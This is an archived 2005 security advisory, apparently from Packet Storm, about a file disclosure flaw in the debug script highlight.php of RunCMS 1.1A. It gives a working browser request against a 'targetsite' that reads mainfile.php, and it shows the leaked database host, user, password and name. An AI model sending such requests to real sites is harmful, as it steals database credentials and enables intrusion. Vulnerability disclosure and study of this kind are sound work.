highlight.txt

2005-03-22T00:00:00
ID PACKETSTORM:36708
Type packetstorm
Reporter NT
Modified 2005-03-22T00:00:00

Description

                                        
                                            `  
********************************************  
IHS Iran Hackers Sabotage Public advisory   
by : NT NT@ihsteam.com  
********************************************  
If You Have RUNCMS Installation Address You Can Use highligh.php Hole   
And Get DataBase Configuration(Name,User,Password)  
Tested In RUNCMS 1.1A  
-------------------------------------------  
Input This Line To Your Browser AddressBar :  
  
http://targetsite/runcmsinstalation/class/debug/highlight.php?  
file=runcmsinstallationpath\mainfile.php&line=151#151  
  
Like This :  
  
http://localhost/runcms/class/debug/highlight.php?  
file=c:\phpdev\www\runcms\mainfile.php&line=151#151  
  
You See This Result :  
  
1 <?php   
2 // -------------------------------------------------------------------  
------ //   
3 // E-Xoops: Content Management for the   
Masses //   
4 // < http://www.e-xoops.com   
> //   
5 // -------------------------------------------------------------------  
------ //   
6   
7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) {   
8 define('XOOPS_MAINFILE_INCLUDED', 1);   
9   
10 // Physical Path   
11 // Physical path to your main RUNCMS directory WITHOUT trailing   
slash. ( On windows use simple forward slashes & be sure to include the   
drive letter. c:/myfolder )   
12 define('XOOPS_ROOT_PATH', 'c:/phpdev/www/runcms1.1');   
13   
14 // Virtual Path (URL)   
15 // Virtual path to your main RUNCMS directory WITHOUT trailing   
slash. ( http://www.mysite.com/myfolder )   
16 define('XOOPS_URL', 'http://localhost/runcms1.1');   
17   
18 // Database   
19 // Choose the type of database to be used.   
20 $xoopsConfig['database'] = 'mysql';   
21   
22 // Table Prefix   
23 // This prefix will be added to all new tables created to avoid   
name conflict in the database. If you are unsure, just use the   
default 'runcms'.   
24 $xoopsConfig['prefix'] = 'runcms';   
25   
26 // Database Hostname   
27 // Hostname of the database server. ( If you are   
unsure, 'localhost' works in most cases. )   
28 $xoopsConfig['dbhost'] = 'localhost';   
29   
30 // Database Username   
31 // Your database user account on the host. ( Often root when   
installed on your local machine. )   
32 $xoopsConfig['dbuname'] = 'root';   
33   
34 // Database Password   
35 // Password for your database user account.   
36 $xoopsConfig['dbpass'] = '';   
37   
38 // Database Name   
39 // The name of database on the host. The installer will attempt   
to create the database if not exist.   
40 $xoopsConfig['dbname'] = 'aaa';   
41   
42 // Use persistent connection? (Yes=1 No=0)   
43 // Default is 'No'. Choose 'No' if you are unsure.   
44 $xoopsConfig['db_pconnect'] = 0;   
45   
46 // Default setup language.   
47 $xoopsConfig['default_language'] = 'english';   
48   
49 include_once(XOOPS_ROOT_PATH.'/include/common.php');   
50 }   
?>   
  
  
  
------------------------------------------  
  
More Information See:  
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12   
  
Source Advisory :  
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=14  
  
Found By NT(IHS)  
NT@IHSTeam.com  
Greet To Lord And C0d3r From IHS.  
www.IHSTeam.com  
  
  
--   
www.IHSTEAM.com  
www.IHSSECURITY.com  
  
`